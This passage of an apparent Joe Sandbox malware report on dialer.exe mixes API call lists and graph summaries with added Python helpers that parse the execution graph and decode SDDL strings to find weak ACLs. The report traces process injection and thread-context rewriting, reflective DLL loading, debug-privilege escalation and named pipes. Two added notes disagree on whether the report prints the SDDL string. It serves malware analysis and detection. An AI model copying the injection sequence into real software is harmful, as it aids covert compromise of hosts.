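ADDR_RE = re.compile(r"^[0-9a-fA-F]{7,16}$")    # assumption: addresses are >= 7 hex digits
API_RE = re.compile(r"^[A-Za-z_]\w*$")
NON_API = {"call", "calls", "API", "*"}          # assumption: filler words seen in the dump

# Constructed input: two fragments copied from this report's execution graph,
# functions 140001b54 (named pipe creation) and 140001c88 (process creation
# with thread-context rewrite). Nodes 443 and 582 are referenced but not defined.
SAMPLE_GRAPH = (
    "453 140001b54 AllocateAndInitializeSid 443->453 454 140001bb1 SetEntriesInAclW "
    "453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 "
    "455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 "
    "458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 "
    "CreateNamedPipeW 458->459 459->455 "
    "616 140001c88 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 "
    "620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 "
    "VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 "
    "619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory "
    "619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 "
    "623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 "
    "627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 "
    "SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 "
    "629->617 629->620"
)


def parse_execution_graph(text):
    """Return ({node_id: {'addr': str, 'labels': [str]}}, [(src, dst), ...])."""
    nodes, edges, current = {}, [], None
    tokens = text.split()
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            # '<id> <address>' opens a new node; following bare tokens are its labels.
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1].lower(), "labels": []}
            i += 1
        elif tok != "execution_graph" and current is not None:
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def api_names(labels):
    """Keep only tokens that look like API names (drop addresses, counts and filler)."""
    return [lab for lab in labels if API_RE.match(lab) and lab not in NON_API]


def reachable_apis(nodes, edges, root):
    """APIs on every node reachable from `root`, depth-first, first successor first."""
    adj = {}
    for src, dst in edges:
        adj.setdefault(src, []).append(dst)
    seen, order, stack = set(), [], [root]
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        order.extend(api_names(nodes.get(node, {"labels": []})["labels"]))
        stack.extend(reversed(adj.get(node, [])))   # so the first-listed edge is followed first
    return order


def node_by_addr(nodes, addr):
    """Node id whose address matches `addr` (case-insensitive), or None."""
    for nid, info in nodes.items():
        if info["addr"] == addr.lower():
            return nid
    return None


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(SAMPLE_GRAPH)
    for start in ("140001b54", "140001c88"):
        nid = node_by_addr(g_nodes, start)
        print(start, "->", ", ".join(reachable_apis(g_nodes, g_edges, nid)))
```

Run on the two fragments it prints the pipe-creation chain for 140001b54 and, for 140001c88, the CreateProcessW / VirtualAllocEx / WriteProcessMemory path followed by the GetThreadContext / SetThreadContext / ResumeThread path; pasting the whole dump from the report in place of SAMPLE_GRAPH gives the same view for every function.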

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
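The String ID list above carries the security-descriptor string the entry function hands to ConvertStringSecurityDescriptorToSecurityDescriptorW before RegSetKeySecurity. The decoder below is an added example, not code from the sample or from Joe Sandbox: it parses SDDL of this shape and flags allow-ACEs that give write-capable rights to principals every ordinary logon holds. The abbreviation tables are the standard SDDL ones for the subset needed here plus a few common neighbours; which principals count as low trust and which rights count as write-capable are this example's own choices.

```python
"""Decode an SDDL security-descriptor string and flag write access for low-trust principals.

Added example for this report; not code from the sample or from Joe Sandbox.
"""
import re

# Constructed input: copied from the report's String ID list for function 140002258.
SAMPLE_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "RC": "READ_CONTROL",
          "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "SD": "DELETE"}
SIDS = {"AU": "Authenticated Users", "BA": "Builtin Administrators", "BU": "Builtin Users",
        "WD": "Everyone", "IU": "Interactive Users", "AN": "Anonymous", "SY": "Local System",
        "LS": "Local Service", "NS": "Network Service"}
LOW_TRUST = {"AU", "BU", "WD", "IU", "AN"}                  # this example's choice
WRITE_RIGHTS = {"GA", "GW", "KA", "KW", "WD", "WO", "SD"}   # this example's choice


def _pairs(field):
    """Split a run of two-letter SDDL codes ('OICI' -> ['OI', 'CI'])."""
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_ace(ace):
    """Parse one ACE body 'type;flags;rights;object_guid;inherit_guid;sid'."""
    fields = ace.split(";")
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields in ACE {ace!r}")
    ace_type, flags, rights, _obj, _inh, sid = fields
    # Rights may be a hex mask instead of two-letter codes; keep it as one token.
    right_codes = [rights] if rights.startswith("0x") else _pairs(rights)
    return {
        "type": ACE_TYPES.get(ace_type, ace_type),
        "flags": [ACE_FLAGS.get(f, f) for f in _pairs(flags)],
        "rights": [RIGHTS.get(r, r) for r in right_codes],
        "trustee": SIDS.get(sid, sid),
        "raw": {"type": ace_type, "rights": right_codes, "sid": sid},
    }


def parse_sddl(sddl):
    """Parse the O:/G:/D:/S: components; ACE fields use ';' so the ':' markers are unambiguous."""
    desc = {"owner": None, "group": None, "dacl_flags": "", "dacl": [], "sacl": []}
    for comp in filter(None, re.split(r"(?=[OGDS]:)", sddl)):
        key, body = comp[0], comp[2:]
        if key == "O":
            desc["owner"] = SIDS.get(body, body)
        elif key == "G":
            desc["group"] = SIDS.get(body, body)
        else:
            aces = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", body)]
            if key == "D":
                desc["dacl_flags"] = body.split("(", 1)[0]   # e.g. 'P' = protected from inheritance
                desc["dacl"] = aces
            else:
                desc["sacl"] = aces
    return desc


def weak_aces(desc):
    """Allow-ACEs that grant a write-capable right to a low-trust principal."""
    return [ace for ace in desc["dacl"]
            if ace["raw"]["type"] == "A"
            and ace["raw"]["sid"] in LOW_TRUST
            and set(ace["raw"]["rights"]) & WRITE_RIGHTS]


if __name__ == "__main__":
    parsed = parse_sddl(SAMPLE_SDDL)
    for ace in parsed["dacl"]:
        print(ace["type"], ace["trustee"], ace["rights"], ace["flags"])
    for ace in weak_aces(parsed):
        print("weak:", ace["trustee"], "gets", ace["rights"])
```

On the report's string the decoder reports one weak ACE: GENERIC_ALL with OBJECT_INHERIT and CONTAINER_INHERIT for Authenticated Users. Applied through RegSetKeySecurity that makes the key and every subkey created under it modifiable from any authenticated account, not only by the process that created it, which is the property to look for when hunting for this key on a host.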

                                                        Control-flow Graph

The rendered control-flow graph of 1400010c0 (dialer.exe, process 63; basic blocks 1400010c0 to 1400014d6, executed and not-executed blocks distinguished only in the rendered view) arrived as one run of block and edge tokens. The calls it records, in block order: call 1400018ac; OpenProcess; OpenProcess; K32GetModuleFileNameExW; PathFindFileNameW, lstrlenW; StrCpyW; CloseHandle; StrCmpIW; NtQueryInformationProcess; OpenProcessToken; GetTokenInformation; GetLastError; LocalAlloc; GetTokenInformation; GetSidSubAuthorityCount, GetSidSubAuthority; LocalFree; CloseHandle; call 140001ec4 (three times); call 140001ec4, StrStrA; call 140001ec4 (twice); VirtualAllocEx; WriteProcessMemory; call 14000211c; WaitForSingleObject; GetExitCodeThread; CloseHandle. Failure edges converge on the block at 1400014b1 (CloseHandle), which falls through to the return block at 1400014ba.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                        Control-flow Graph

Blocks as id: address range, API calls; edges as id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
• 129: 1400021d0-1400021da
• 130: 1400021dd-1400021f0, call 140001b54
• 133: 1400021f2-1400021fb, Sleep
• 134: 1400021fd-14000220a, ConnectNamedPipe
• 135: 140002241-140002246, Sleep
• 136: 14000220c-14000222d, ReadFile
• 137: 14000224c-140002255, DisconnectNamedPipe
• 138: 14000222f-140002234
• 139: 140002236-14000223f
Edges: 129->130, 130->133, 130->134, 133->130, 134->135, 134->136, 135->137, 136->137, 136->138, 137->134, 138->137, 138->139, 139->137
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                        Control-flow Graph

Blocks as id: address range, API calls; edges as id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
• 149: 140002b38-140002b8c, GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc
• 150: 140002b8e-140002ba1, K32EnumProcesses
• 151: 140002ba3-140002bb2
• 152: 140002beb-140002bf4, SleepEx
• 153: 140002bb4-140002bb8
• 154: 140002bdc-140002be7
• 155: 140002bba
• 156: 140002bcb-140002bce, call 140002540
• 157: 140002bbe-140002bc3
• 158: 140002bc5-140002bc9
• 159: 140002bd6-140002bda
• 160: 140002bd2
Edges: 149->150, 150->151, 150->152, 151->153, 151->154, 152->150, 153->155, 153->156, 155->157, 156->160, 157->158, 157->159, 158->156, 158->157, 159->153, 159->154, 160->159
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                        Control-flow Graph

Blocks as id: address range, API calls; edges as id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
• 173: 1400018ac-1400018d6, OpenProcess
• 174: 140001901-140001912
• 175: 1400018d8-1400018e8, IsWow64Process
• 176: 1400018f8-1400018fb, CloseHandle
• 177: 1400018ea-1400018f3
Edges: 173->174, 173->175, 175->176, 175->177, 176->174, 177->176
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                        Control-flow Graph

Blocks as id: address range, API calls; edges as id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
• 178: 140002258-14000225c, call 14000226c
• 180: 140002261-140002263, ExitProcess
Edges: 178->180
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716
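The initialisation routine at 000000014000226C above ends with RegCreateKeyExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegSetKeySecurity and LocalFree: a registry key is created and then given a security descriptor that the code supplies as an SDDL string. The report does not print that string. The Python below is an added example, not code from the report or from the sample: it decodes the DACL part of an SDDL string and runs the ordered ACE walk Windows uses to answer who can still read, write or delete such a key. The MALWARE_SDDL and BASELINE_SDDL descriptors and the three token SID sets are constructed for illustration; the well-known SID aliases and rights codes are the documented SDDL ones.

```python
"""Decode SDDL DACLs and evaluate who can access a protected registry key (added example)."""
import re

ACE_TYPE = {"A": "allow", "D": "deny"}
ACE_FLAG = {"CI": "container_inherit", "OI": "object_inherit", "NP": "no_propagate",
            "IO": "inherit_only", "ID": "inherited"}
# Generic and registry-specific rights codes expanded to the primitive rights this checker reasons about.
KEY_ALL = {"read", "write", "delete", "write_dac", "write_owner", "read_control"}
RIGHT = {"KA": KEY_ALL, "GA": KEY_ALL,
         "KR": {"read", "read_control"}, "KX": {"read", "read_control"},
         "GR": {"read", "read_control"}, "GX": {"read", "read_control"},
         "KW": {"write", "read_control"}, "GW": {"write", "read_control"},
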